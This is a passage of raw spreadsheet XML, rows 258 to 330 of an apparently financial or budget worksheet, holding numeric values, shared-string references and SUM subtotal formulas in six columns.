        <f>SUM(C259:C263,C268:C272,C275:C278,C283:C287,C290,C291,C295)</f>
        <v>23850</v>
      </c>
      <c r="D258" s="13" t="s">
        <v>4782</v>
      </c>
      <c r="E258" s="16" t="s">
        <v>2917</v>
      </c>
      <c r="F258" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="259" spans="1:6">
      <c r="A259" s="10" t="s">
        <v>4783</v>
      </c>
      <c r="B259" s="16" t="s">
        <v>2918</v>
      </c>
      <c r="C259" s="17">
        <v>0</v>
      </c>
      <c r="D259" s="13" t="s">
        <v>4784</v>
      </c>
      <c r="E259" s="16" t="s">
        <v>2919</v>
      </c>
      <c r="F259" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="260" spans="1:6">
      <c r="A260" s="10" t="s">
        <v>4785</v>
      </c>
      <c r="B260" s="16" t="s">
        <v>2920</v>
      </c>
      <c r="C260" s="17">
        <v>0</v>
      </c>
      <c r="D260" s="13" t="s">
        <v>4786</v>
      </c>
      <c r="E260" s="11" t="s">
        <v>2921</v>
      </c>
      <c r="F260" s="12">
        <f>F261</f>
        <v>0</v>
      </c>
    </row>
    <row r="261" spans="1:6">
      <c r="A261" s="10" t="s">
        <v>4787</v>
      </c>
      <c r="B261" s="16" t="s">
        <v>2922</v>
      </c>
      <c r="C261" s="17">
        <v>0</v>
      </c>
      <c r="D261" s="13" t="s">
        <v>4788</v>
      </c>
      <c r="E261" s="16" t="s">
        <v>2923</v>
      </c>
      <c r="F261" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="262" spans="1:6">
      <c r="A262" s="10" t="s">
        <v>4789</v>
      </c>
      <c r="B262" s="16" t="s">
        <v>2924</v>
      </c>
      <c r="C262" s="17">
        <v>0</v>
      </c>
      <c r="D262" s="13" t="s">
        <v>4790</v>
      </c>
      <c r="E262" s="11" t="s">
        <v>2925</v>
      </c>
      <c r="F262" s="12">
        <f>SUM(F263:F266)</f>
        <v>0</v>
      </c>
    </row>
    <row r="263" spans="1:6">
      <c r="A263" s="10" t="s">
        <v>4791</v>
      </c>
      <c r="B263" s="16" t="s">
        <v>2926</v>
      </c>
      <c r="C263" s="12">
        <f>SUM(C264:C267)</f>
        <v>1533</v>
      </c>
      <c r="D263" s="13" t="s">
        <v>4792</v>
      </c>
      <c r="E263" s="16" t="s">
        <v>2927</v>
      </c>
      <c r="F263" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="264" spans="1:6">
      <c r="A264" s="10" t="s">
        <v>4793</v>
      </c>
      <c r="B264" s="16" t="s">
        <v>2928</v>
      </c>
      <c r="C264" s="17">
        <v>43</v>
      </c>
      <c r="D264" s="13" t="s">
        <v>4794</v>
      </c>
      <c r="E264" s="16" t="s">
        <v>2929</v>
      </c>
      <c r="F264" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="265" spans="1:6">
      <c r="A265" s="10" t="s">
        <v>4795</v>
      </c>
      <c r="B265" s="16" t="s">
        <v>2930</v>
      </c>
      <c r="C265" s="17">
        <v>0</v>
      </c>
      <c r="D265" s="13" t="s">
        <v>4796</v>
      </c>
      <c r="E265" s="16" t="s">
        <v>2931</v>
      </c>
      <c r="F265" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="266" spans="1:6">
      <c r="A266" s="10" t="s">
        <v>4797</v>
      </c>
      <c r="B266" s="16" t="s">
        <v>2932</v>
      </c>
      <c r="C266" s="17">
        <v>0</v>
      </c>
      <c r="D266" s="13" t="s">
        <v>4798</v>
      </c>
      <c r="E266" s="16" t="s">
        <v>2933</v>
      </c>
      <c r="F266" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="267" spans="1:6">
      <c r="A267" s="10" t="s">
        <v>4799</v>
      </c>
      <c r="B267" s="16" t="s">
        <v>2934</v>
      </c>
      <c r="C267" s="17">
        <v>1490</v>
      </c>
      <c r="D267" s="13" t="s">
        <v>4800</v>
      </c>
      <c r="E267" s="11" t="s">
        <v>2935</v>
      </c>
      <c r="F267" s="12">
        <f>SUM(F268:F272)</f>
        <v>0</v>
      </c>
    </row>
    <row r="268" spans="1:6">
      <c r="A268" s="10" t="s">
        <v>4801</v>
      </c>
      <c r="B268" s="16" t="s">
        <v>2936</v>
      </c>
      <c r="C268" s="17">
        <v>724</v>
      </c>
      <c r="D268" s="13" t="s">
        <v>4802</v>
      </c>
      <c r="E268" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F268" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="269" spans="1:6">
      <c r="A269" s="10" t="s">
        <v>4803</v>
      </c>
      <c r="B269" s="16" t="s">
        <v>2937</v>
      </c>
      <c r="C269" s="17">
        <v>0</v>
      </c>
      <c r="D269" s="13" t="s">
        <v>4804</v>
      </c>
      <c r="E269" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F269" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="270" spans="1:6">
      <c r="A270" s="10" t="s">
        <v>4805</v>
      </c>
      <c r="B270" s="16" t="s">
        <v>2938</v>
      </c>
      <c r="C270" s="17">
        <v>0</v>
      </c>
      <c r="D270" s="13" t="s">
        <v>4806</v>
      </c>
      <c r="E270" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F270" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="271" spans="1:6">
      <c r="A271" s="10" t="s">
        <v>4807</v>
      </c>
      <c r="B271" s="16" t="s">
        <v>2939</v>
      </c>
      <c r="C271" s="17">
        <v>0</v>
      </c>
      <c r="D271" s="13" t="s">
        <v>4808</v>
      </c>
      <c r="E271" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F271" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="272" spans="1:6">
      <c r="A272" s="10" t="s">
        <v>4809</v>
      </c>
      <c r="B272" s="16" t="s">
        <v>2940</v>
      </c>
      <c r="C272" s="12">
        <f>C273+C274</f>
        <v>0</v>
      </c>
      <c r="D272" s="13" t="s">
        <v>4810</v>
      </c>
      <c r="E272" s="16" t="s">
        <v>2941</v>
      </c>
      <c r="F272" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="273" spans="1:6">
      <c r="A273" s="10" t="s">
        <v>4811</v>
      </c>
      <c r="B273" s="16" t="s">
        <v>2942</v>
      </c>
      <c r="C273" s="17">
        <v>0</v>
      </c>
      <c r="D273" s="13" t="s">
        <v>4812</v>
      </c>
      <c r="E273" s="11" t="s">
        <v>2943</v>
      </c>
      <c r="F273" s="14">
        <f>F274</f>
        <v>0</v>
      </c>
    </row>
    <row r="274" spans="1:6">
      <c r="A274" s="10" t="s">
        <v>4813</v>
      </c>
      <c r="B274" s="16" t="s">
        <v>2944</v>
      </c>
      <c r="C274" s="17">
        <v>0</v>
      </c>
      <c r="D274" s="13" t="s">
        <v>4814</v>
      </c>
      <c r="E274" s="11" t="s">
        <v>2945</v>
      </c>
      <c r="F274" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="275" spans="1:6">
      <c r="A275" s="10" t="s">
        <v>4815</v>
      </c>
      <c r="B275" s="16" t="s">
        <v>2946</v>
      </c>
      <c r="C275" s="17">
        <v>0</v>
      </c>
      <c r="D275" s="13" t="s">
        <v>4816</v>
      </c>
      <c r="E275" s="11" t="s">
        <v>2947</v>
      </c>
      <c r="F275" s="15">
        <f>SUM(F276,F278,F280,F282,F292)</f>
        <v>384</v>
      </c>
    </row>
    <row r="276" spans="1:6">
      <c r="A276" s="10" t="s">
        <v>4817</v>
      </c>
      <c r="B276" s="16" t="s">
        <v>2948</v>
      </c>
      <c r="C276" s="17">
        <v>0</v>
      </c>
      <c r="D276" s="13" t="s">
        <v>4818</v>
      </c>
      <c r="E276" s="11" t="s">
        <v>2949</v>
      </c>
      <c r="F276" s="12">
        <f>F277</f>
        <v>0</v>
      </c>
    </row>
    <row r="277" spans="1:6">
      <c r="A277" s="10" t="s">
        <v>4819</v>
      </c>
      <c r="B277" s="16" t="s">
        <v>2950</v>
      </c>
      <c r="C277" s="17">
        <v>0</v>
      </c>
      <c r="D277" s="13" t="s">
        <v>4820</v>
      </c>
      <c r="E277" s="16" t="s">
        <v>2951</v>
      </c>
      <c r="F277" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="278" spans="1:6">
      <c r="A278" s="10" t="s">
        <v>4821</v>
      </c>
      <c r="B278" s="16" t="s">
        <v>2952</v>
      </c>
      <c r="C278" s="12">
        <f>SUM(C279:C282)</f>
        <v>889</v>
      </c>
      <c r="D278" s="13" t="s">
        <v>4822</v>
      </c>
      <c r="E278" s="11" t="s">
        <v>2953</v>
      </c>
      <c r="F278" s="12">
        <f>F279</f>
        <v>0</v>
      </c>
    </row>
    <row r="279" spans="1:6">
      <c r="A279" s="10" t="s">
        <v>4823</v>
      </c>
      <c r="B279" s="16" t="s">
        <v>2954</v>
      </c>
      <c r="C279" s="17">
        <v>0</v>
      </c>
      <c r="D279" s="13" t="s">
        <v>4824</v>
      </c>
      <c r="E279" s="16" t="s">
        <v>2955</v>
      </c>
      <c r="F279" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="280" spans="1:6">
      <c r="A280" s="10" t="s">
        <v>4825</v>
      </c>
      <c r="B280" s="16" t="s">
        <v>2956</v>
      </c>
      <c r="C280" s="17">
        <v>0</v>
      </c>
      <c r="D280" s="13" t="s">
        <v>4826</v>
      </c>
      <c r="E280" s="11" t="s">
        <v>2957</v>
      </c>
      <c r="F280" s="12">
        <f>F281</f>
        <v>0</v>
      </c>
    </row>
    <row r="281" spans="1:6">
      <c r="A281" s="10" t="s">
        <v>4827</v>
      </c>
      <c r="B281" s="16" t="s">
        <v>2958</v>
      </c>
      <c r="C281" s="17">
        <v>889</v>
      </c>
      <c r="D281" s="13" t="s">
        <v>4828</v>
      </c>
      <c r="E281" s="16" t="s">
        <v>2959</v>
      </c>
      <c r="F281" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="282" spans="1:6">
      <c r="A282" s="10" t="s">
        <v>4829</v>
      </c>
      <c r="B282" s="16" t="s">
        <v>2960</v>
      </c>
      <c r="C282" s="17">
        <v>0</v>
      </c>
      <c r="D282" s="13" t="s">
        <v>4830</v>
      </c>
      <c r="E282" s="11" t="s">
        <v>2961</v>
      </c>
      <c r="F282" s="12">
        <f>SUM(F283:F291)</f>
        <v>119</v>
      </c>
    </row>
    <row r="283" spans="1:6">
      <c r="A283" s="10" t="s">
        <v>4831</v>
      </c>
      <c r="B283" s="16" t="s">
        <v>2962</v>
      </c>
      <c r="C283" s="17">
        <v>0</v>
      </c>
      <c r="D283" s="13" t="s">
        <v>4832</v>
      </c>
      <c r="E283" s="16" t="s">
        <v>2963</v>
      </c>
      <c r="F283" s="17">
        <v>15</v>
      </c>
    </row>
    <row r="284" spans="1:6">
      <c r="A284" s="10" t="s">
        <v>4833</v>
      </c>
      <c r="B284" s="16" t="s">
        <v>2964</v>
      </c>
      <c r="C284" s="17">
        <v>0</v>
      </c>
      <c r="D284" s="13" t="s">
        <v>4834</v>
      </c>
      <c r="E284" s="16" t="s">
        <v>2965</v>
      </c>
      <c r="F284" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="285" spans="1:6">
      <c r="A285" s="10" t="s">
        <v>4835</v>
      </c>
      <c r="B285" s="16" t="s">
        <v>2966</v>
      </c>
      <c r="C285" s="17">
        <v>0</v>
      </c>
      <c r="D285" s="13" t="s">
        <v>4836</v>
      </c>
      <c r="E285" s="16" t="s">
        <v>2967</v>
      </c>
      <c r="F285" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="286" spans="1:6">
      <c r="A286" s="10" t="s">
        <v>2968</v>
      </c>
      <c r="B286" s="16" t="s">
        <v>2969</v>
      </c>
      <c r="C286" s="17">
        <v>0</v>
      </c>
      <c r="D286" s="13" t="s">
        <v>4837</v>
      </c>
      <c r="E286" s="16" t="s">
        <v>2970</v>
      </c>
      <c r="F286" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="287" spans="1:6">
      <c r="A287" s="10" t="s">
        <v>2971</v>
      </c>
      <c r="B287" s="16" t="s">
        <v>2972</v>
      </c>
      <c r="C287" s="12">
        <f>SUM(C288:C289)</f>
        <v>0</v>
      </c>
      <c r="D287" s="13" t="s">
        <v>4838</v>
      </c>
      <c r="E287" s="16" t="s">
        <v>2973</v>
      </c>
      <c r="F287" s="17">
        <v>9</v>
      </c>
    </row>
    <row r="288" spans="1:6">
      <c r="A288" s="10" t="s">
        <v>2974</v>
      </c>
      <c r="B288" s="16" t="s">
        <v>2975</v>
      </c>
      <c r="C288" s="17">
        <v>0</v>
      </c>
      <c r="D288" s="13" t="s">
        <v>4839</v>
      </c>
      <c r="E288" s="16" t="s">
        <v>2976</v>
      </c>
      <c r="F288" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="289" spans="1:6">
      <c r="A289" s="10" t="s">
        <v>2977</v>
      </c>
      <c r="B289" s="16" t="s">
        <v>2978</v>
      </c>
      <c r="C289" s="17">
        <v>0</v>
      </c>
      <c r="D289" s="13" t="s">
        <v>4840</v>
      </c>
      <c r="E289" s="16" t="s">
        <v>2979</v>
      </c>
      <c r="F289" s="17">
        <v>95</v>
      </c>
    </row>
    <row r="290" spans="1:6">
      <c r="A290" s="10" t="s">
        <v>2980</v>
      </c>
      <c r="B290" s="16" t="s">
        <v>2981</v>
      </c>
      <c r="C290" s="17">
        <v>0</v>
      </c>
      <c r="D290" s="13" t="s">
        <v>4841</v>
      </c>
      <c r="E290" s="16" t="s">
        <v>2982</v>
      </c>
      <c r="F290" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="291" spans="1:6">
      <c r="A291" s="10" t="s">
        <v>4842</v>
      </c>
      <c r="B291" s="16" t="s">
        <v>2983</v>
      </c>
      <c r="C291" s="12">
        <f>SUM(C292:C294)</f>
        <v>0</v>
      </c>
      <c r="D291" s="13" t="s">
        <v>4843</v>
      </c>
      <c r="E291" s="16" t="s">
        <v>2984</v>
      </c>
      <c r="F291" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="292" spans="1:6">
      <c r="A292" s="10" t="s">
        <v>4844</v>
      </c>
      <c r="B292" s="16" t="s">
        <v>2985</v>
      </c>
      <c r="C292" s="17">
        <v>0</v>
      </c>
      <c r="D292" s="13" t="s">
        <v>4845</v>
      </c>
      <c r="E292" s="11" t="s">
        <v>2986</v>
      </c>
      <c r="F292" s="12">
        <f>F293</f>
        <v>265</v>
      </c>
    </row>
    <row r="293" spans="1:6">
      <c r="A293" s="10" t="s">
        <v>4846</v>
      </c>
      <c r="B293" s="16" t="s">
        <v>2987</v>
      </c>
      <c r="C293" s="17">
        <v>0</v>
      </c>
      <c r="D293" s="13" t="s">
        <v>4847</v>
      </c>
      <c r="E293" s="16" t="s">
        <v>2988</v>
      </c>
      <c r="F293" s="17">
        <v>265</v>
      </c>
    </row>
    <row r="294" spans="1:6">
      <c r="A294" s="10" t="s">
        <v>4848</v>
      </c>
      <c r="B294" s="16" t="s">
        <v>2989</v>
      </c>
      <c r="C294" s="17">
        <v>0</v>
      </c>
      <c r="D294" s="13" t="s">
        <v>4849</v>
      </c>
      <c r="E294" s="11" t="s">
        <v>2990</v>
      </c>
      <c r="F294" s="12">
        <f>F295+F298+F309+F316+F324+F333+F347+F357+F367+F375+F381</f>
        <v>21519</v>
      </c>
    </row>
    <row r="295" spans="1:6">
      <c r="A295" s="10" t="s">
        <v>4850</v>
      </c>
      <c r="B295" s="16" t="s">
        <v>2991</v>
      </c>
      <c r="C295" s="17">
        <v>20704</v>
      </c>
      <c r="D295" s="13" t="s">
        <v>4851</v>
      </c>
      <c r="E295" s="11" t="s">
        <v>2992</v>
      </c>
      <c r="F295" s="12">
        <f>SUM(F296:F297)</f>
        <v>115</v>
      </c>
    </row>
    <row r="296" spans="1:6">
      <c r="A296" s="10" t="s">
        <v>4852</v>
      </c>
      <c r="B296" s="11" t="s">
        <v>2993</v>
      </c>
      <c r="C296" s="12">
        <f>SUM(C297:C298)</f>
        <v>0</v>
      </c>
      <c r="D296" s="13" t="s">
        <v>4853</v>
      </c>
      <c r="E296" s="16" t="s">
        <v>2994</v>
      </c>
      <c r="F296" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="297" spans="1:6">
      <c r="A297" s="10" t="s">
        <v>4854</v>
      </c>
      <c r="B297" s="16" t="s">
        <v>2995</v>
      </c>
      <c r="C297" s="17">
        <v>0</v>
      </c>
      <c r="D297" s="13" t="s">
        <v>4855</v>
      </c>
      <c r="E297" s="16" t="s">
        <v>2996</v>
      </c>
      <c r="F297" s="17">
        <v>115</v>
      </c>
    </row>
    <row r="298" spans="1:6">
      <c r="A298" s="10" t="s">
        <v>4856</v>
      </c>
      <c r="B298" s="16" t="s">
        <v>2997</v>
      </c>
      <c r="C298" s="17">
        <v>0</v>
      </c>
      <c r="D298" s="13" t="s">
        <v>4857</v>
      </c>
      <c r="E298" s="11" t="s">
        <v>2998</v>
      </c>
      <c r="F298" s="12">
        <f>SUM(F299:F308)</f>
        <v>13323</v>
      </c>
    </row>
    <row r="299" spans="1:6">
      <c r="A299" s="10" t="s">
        <v>4858</v>
      </c>
      <c r="B299" s="11" t="s">
        <v>2999</v>
      </c>
      <c r="C299" s="12">
        <f>SUM(C300:C304)</f>
        <v>0</v>
      </c>
      <c r="D299" s="13" t="s">
        <v>4859</v>
      </c>
      <c r="E299" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F299" s="17">
        <v>10385</v>
      </c>
    </row>
    <row r="300" spans="1:6">
      <c r="A300" s="10" t="s">
        <v>4860</v>
      </c>
      <c r="B300" s="16" t="s">
        <v>3000</v>
      </c>
      <c r="C300" s="17">
        <v>0</v>
      </c>
      <c r="D300" s="13" t="s">
        <v>4861</v>
      </c>
      <c r="E300" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F300" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="301" spans="1:6">
      <c r="A301" s="10" t="s">
        <v>4862</v>
      </c>
      <c r="B301" s="16" t="s">
        <v>3001</v>
      </c>
      <c r="C301" s="17">
        <v>0</v>
      </c>
      <c r="D301" s="13" t="s">
        <v>4863</v>
      </c>
      <c r="E301" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F301" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="302" spans="1:6">
      <c r="A302" s="10" t="s">
        <v>4864</v>
      </c>
      <c r="B302" s="16" t="s">
        <v>3002</v>
      </c>
      <c r="C302" s="17">
        <v>0</v>
      </c>
      <c r="D302" s="18" t="s">
        <v>4865</v>
      </c>
      <c r="E302" s="19" t="s">
        <v>2622</v>
      </c>
      <c r="F302" s="20">
        <v>200</v>
      </c>
    </row>
    <row r="303" spans="1:6">
      <c r="A303" s="10" t="s">
        <v>4866</v>
      </c>
      <c r="B303" s="16" t="s">
        <v>3003</v>
      </c>
      <c r="C303" s="17">
        <v>0</v>
      </c>
      <c r="D303" s="13" t="s">
        <v>4867</v>
      </c>
      <c r="E303" s="16" t="s">
        <v>3004</v>
      </c>
      <c r="F303" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="304" spans="1:6">
      <c r="A304" s="10" t="s">
        <v>4868</v>
      </c>
      <c r="B304" s="16" t="s">
        <v>3005</v>
      </c>
      <c r="C304" s="17">
        <v>0</v>
      </c>
      <c r="D304" s="13" t="s">
        <v>4869</v>
      </c>
      <c r="E304" s="16" t="s">
        <v>3006</v>
      </c>
      <c r="F304" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="305" spans="1:6">
      <c r="A305" s="10" t="s">
        <v>4870</v>
      </c>
      <c r="B305" s="11" t="s">
        <v>3007</v>
      </c>
      <c r="C305" s="12">
        <f>SUM(C306:C313)</f>
        <v>98</v>
      </c>
      <c r="D305" s="13" t="s">
        <v>4871</v>
      </c>
      <c r="E305" s="16" t="s">
        <v>3008</v>
      </c>
      <c r="F305" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="306" spans="1:6">
      <c r="A306" s="10" t="s">
        <v>4872</v>
      </c>
      <c r="B306" s="16" t="s">
        <v>3009</v>
      </c>
      <c r="C306" s="17">
        <v>0</v>
      </c>
      <c r="D306" s="13" t="s">
        <v>4873</v>
      </c>
      <c r="E306" s="16" t="s">
        <v>3010</v>
      </c>
      <c r="F306" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="307" spans="1:6">
      <c r="A307" s="10" t="s">
        <v>4874</v>
      </c>
      <c r="B307" s="16" t="s">
        <v>3011</v>
      </c>
      <c r="C307" s="17">
        <v>0</v>
      </c>
      <c r="D307" s="13" t="s">
        <v>4875</v>
      </c>
      <c r="E307" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F307" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="308" spans="1:6">
      <c r="A308" s="10" t="s">
        <v>4876</v>
      </c>
      <c r="B308" s="16" t="s">
        <v>3012</v>
      </c>
      <c r="C308" s="17">
        <v>0</v>
      </c>
      <c r="D308" s="13" t="s">
        <v>4877</v>
      </c>
      <c r="E308" s="16" t="s">
        <v>3013</v>
      </c>
      <c r="F308" s="17">
        <v>2738</v>
      </c>
    </row>
    <row r="309" spans="1:6">
      <c r="A309" s="10" t="s">
        <v>4878</v>
      </c>
      <c r="B309" s="16" t="s">
        <v>3014</v>
      </c>
      <c r="C309" s="17">
        <v>0</v>
      </c>
      <c r="D309" s="13" t="s">
        <v>4879</v>
      </c>
      <c r="E309" s="11" t="s">
        <v>3015</v>
      </c>
      <c r="F309" s="12">
        <f>SUM(F310:F315)</f>
        <v>0</v>
      </c>
    </row>
    <row r="310" spans="1:6">
      <c r="A310" s="10" t="s">
        <v>4880</v>
      </c>
      <c r="B310" s="16" t="s">
        <v>3016</v>
      </c>
      <c r="C310" s="17">
        <v>0</v>
      </c>
      <c r="D310" s="13" t="s">
        <v>4881</v>
      </c>
      <c r="E310" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F310" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="311" spans="1:6">
      <c r="A311" s="10" t="s">
        <v>4882</v>
      </c>
      <c r="B311" s="16" t="s">
        <v>3017</v>
      </c>
      <c r="C311" s="17">
        <v>0</v>
      </c>
      <c r="D311" s="13" t="s">
        <v>4883</v>
      </c>
      <c r="E311" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F311" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="312" spans="1:6">
      <c r="A312" s="10" t="s">
        <v>4884</v>
      </c>
      <c r="B312" s="16" t="s">
        <v>3018</v>
      </c>
      <c r="C312" s="17">
        <v>0</v>
      </c>
      <c r="D312" s="13" t="s">
        <v>4885</v>
      </c>
      <c r="E312" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F312" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="313" spans="1:6">
      <c r="A313" s="10" t="s">
        <v>4886</v>
      </c>
      <c r="B313" s="16" t="s">
        <v>3019</v>
      </c>
      <c r="C313" s="17">
        <v>98</v>
      </c>
      <c r="D313" s="13" t="s">
        <v>4887</v>
      </c>
      <c r="E313" s="16" t="s">
        <v>3020</v>
      </c>
      <c r="F313" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="314" spans="1:6">
      <c r="A314" s="10"/>
      <c r="B314" s="16"/>
      <c r="C314" s="21"/>
      <c r="D314" s="13" t="s">
        <v>4888</v>
      </c>
      <c r="E314" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F314" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="315" spans="1:6">
      <c r="A315" s="10"/>
      <c r="B315" s="11" t="s">
        <v>3021</v>
      </c>
      <c r="C315" s="12">
        <f>C316+C360</f>
        <v>224190</v>
      </c>
      <c r="D315" s="13" t="s">
        <v>4889</v>
      </c>
      <c r="E315" s="16" t="s">
        <v>3022</v>
      </c>
      <c r="F315" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="316" spans="1:6">
      <c r="A316" s="10" t="s">
        <v>4890</v>
      </c>
      <c r="B316" s="11" t="s">
        <v>3023</v>
      </c>
      <c r="C316" s="12">
        <f>SUM(C317:C326,C332:C337,C340:C342,C345:C351,C359)</f>
        <v>222875</v>
      </c>
      <c r="D316" s="13" t="s">
        <v>4891</v>
      </c>
      <c r="E316" s="11" t="s">
        <v>3024</v>
      </c>
      <c r="F316" s="12">
        <f>SUM(F317:F323)</f>
        <v>1623</v>
      </c>
    </row>
    <row r="317" spans="1:6">
      <c r="A317" s="10" t="s">
        <v>4892</v>
      </c>
      <c r="B317" s="16" t="s">
        <v>3025</v>
      </c>
      <c r="C317" s="17">
        <v>0</v>
      </c>
      <c r="D317" s="13" t="s">
        <v>4893</v>
      </c>
      <c r="E317" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F317" s="17">
        <v>1190</v>
      </c>
    </row>
    <row r="318" spans="1:6">
      <c r="A318" s="10" t="s">
        <v>4894</v>
      </c>
      <c r="B318" s="16" t="s">
        <v>3026</v>
      </c>
      <c r="C318" s="17">
        <v>0</v>
      </c>
      <c r="D318" s="13" t="s">
        <v>4895</v>
      </c>
      <c r="E318" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F318" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="319" spans="1:6">
      <c r="A319" s="10" t="s">
        <v>4896</v>
      </c>
      <c r="B319" s="16" t="s">
        <v>3027</v>
      </c>
      <c r="C319" s="17">
        <v>0</v>
      </c>
      <c r="D319" s="13" t="s">
        <v>4897</v>
      </c>
      <c r="E319" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F319" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="320" spans="1:6">
      <c r="A320" s="10" t="s">
        <v>4898</v>
      </c>
      <c r="B320" s="16" t="s">
        <v>3028</v>
      </c>
      <c r="C320" s="17">
        <v>0</v>
      </c>
      <c r="D320" s="13" t="s">
        <v>4899</v>
      </c>
      <c r="E320" s="16" t="s">
        <v>3029</v>
      </c>
      <c r="F320" s="17">
        <v>100</v>
      </c>
    </row>
    <row r="321" spans="1:6">
      <c r="A321" s="10" t="s">
        <v>4900</v>
      </c>
      <c r="B321" s="16" t="s">
        <v>3030</v>
      </c>
      <c r="C321" s="17">
        <v>0</v>
      </c>
      <c r="D321" s="13" t="s">
        <v>4901</v>
      </c>
      <c r="E321" s="16" t="s">
        <v>3031</v>
      </c>
      <c r="F321" s="17">
        <v>10</v>
      </c>
    </row>
    <row r="322" spans="1:6">
      <c r="A322" s="10" t="s">
        <v>4902</v>
      </c>
      <c r="B322" s="16" t="s">
        <v>3032</v>
      </c>
      <c r="C322" s="17">
        <v>0</v>
      </c>
      <c r="D322" s="13" t="s">
        <v>4903</v>
      </c>
      <c r="E322" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F322" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="323" spans="1:6">
      <c r="A323" s="10" t="s">
        <v>4904</v>
      </c>
      <c r="B323" s="16" t="s">
        <v>3033</v>
      </c>
      <c r="C323" s="17">
        <v>0</v>
      </c>
      <c r="D323" s="13" t="s">
        <v>4905</v>
      </c>
      <c r="E323" s="16" t="s">
        <v>3034</v>
      </c>
      <c r="F323" s="17">
        <v>323</v>
      </c>
    </row>
    <row r="324" spans="1:6">
      <c r="A324" s="10" t="s">
        <v>4906</v>
      </c>
      <c r="B324" s="16" t="s">
        <v>3035</v>
      </c>
      <c r="C324" s="17">
        <v>0</v>
      </c>
      <c r="D324" s="13" t="s">
        <v>4907</v>
      </c>
      <c r="E324" s="11" t="s">
        <v>3036</v>
      </c>
      <c r="F324" s="12">
        <f>SUM(F325:F332)</f>
        <v>4189</v>
      </c>
    </row>
    <row r="325" spans="1:6">
      <c r="A325" s="10" t="s">
        <v>4908</v>
      </c>
      <c r="B325" s="16" t="s">
        <v>3037</v>
      </c>
      <c r="C325" s="17">
        <v>0</v>
      </c>
      <c r="D325" s="13" t="s">
        <v>4909</v>
      </c>
      <c r="E325" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F325" s="17">
        <v>2399</v>
      </c>
    </row>
    <row r="326" spans="1:6">
      <c r="A326" s="10" t="s">
        <v>4910</v>
      </c>
      <c r="B326" s="16" t="s">
        <v>3038</v>
      </c>
      <c r="C326" s="12">
        <f>SUM(C327:C331)</f>
        <v>212529</v>
      </c>
      <c r="D326" s="13" t="s">
        <v>4911</v>
      </c>
      <c r="E326" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F326" s="17">
        <v>650</v>
      </c>
    </row>
    <row r="327" spans="1:6">
      <c r="A327" s="10" t="s">
        <v>4912</v>
      </c>
      <c r="B327" s="16" t="s">
        <v>3039</v>
      </c>
      <c r="C327" s="17">
        <v>159644</v>
      </c>
      <c r="D327" s="13" t="s">
        <v>4913</v>
      </c>
      <c r="E327" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F327" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="328" spans="1:6">
      <c r="A328" s="10" t="s">
        <v>4914</v>
      </c>
      <c r="B328" s="16" t="s">
        <v>3040</v>
      </c>
      <c r="C328" s="17">
        <v>4226</v>
      </c>
      <c r="D328" s="13" t="s">
        <v>4915</v>
      </c>
      <c r="E328" s="16" t="s">
        <v>3041</v>
      </c>
      <c r="F328" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="329" spans="1:6">
      <c r="A329" s="10" t="s">
        <v>4916</v>
      </c>
      <c r="B329" s="16" t="s">
        <v>3042</v>
      </c>
      <c r="C329" s="17">
        <v>43888</v>
      </c>
      <c r="D329" s="13" t="s">
        <v>4917</v>
      </c>
      <c r="E329" s="16" t="s">
        <v>3043</v>
      </c>
      <c r="F329" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="330" spans="1:6">
      <c r="A330" s="10" t="s">
        <v>4918</v>
      </c>
      <c r="B330" s="16" t="s">
